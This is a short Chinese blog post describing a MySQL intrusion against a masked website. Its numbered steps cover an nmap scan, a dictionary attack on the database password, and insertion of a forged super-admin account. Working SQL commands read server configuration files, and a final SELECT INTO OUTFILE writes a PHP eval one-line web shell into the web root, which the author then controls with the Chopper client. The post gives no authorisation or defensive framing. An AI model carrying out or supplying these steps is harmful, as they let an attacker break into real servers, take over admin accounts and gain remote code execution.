一次mysql渗透过程

2018-08-28 11:15:14 浏览数 (1)

1 打开目标站点:www.xxx.com

2 注册账号并登录,大概找下注入点,没找到

3 用namp -A -T4 目标站点扫描开放的服务

   发现mysql等

4 猜弱口令 字典  对mysql进行了破译  (运气较好,得到了密码)

5 连接到mysql   找到用户表,密码用md5加密,试了几个,解不出来,应该有加随机字符

   于是复制了一个超级管理员,用户名及密码复制之前注册的账号

6  打开网站首页,登录,进入管理界面。没找到上传漏洞,也没发现物理路径。

7  在mysql 中尝试读取文件

    select load_file('c:/windows/php.ini');  结果为null

  于是创建新表

create table datainfo (aaa text);

  尝试读取文件到表中

       load data infile 'php.ini' into table datainfo; 提示D:phpStudy4IISMySQLdatafactoryphp.ini not found

  可以看出是用phpStudy4IIS创建的,于是下载一个phpStudy4IIS研究目录

      select load_file('D:/phpStudy4IIS/tools/phpStudy.ini');  发现网站根目录等

     写入一句话

     select '<?php @eval($_POST[cmd]); ?>' into outfile 'D:/phpStudy4IIS/WWW/include/xx.php';

     用菜刀连接:www.xxx.com/include/xx.php   cmd

0 人点赞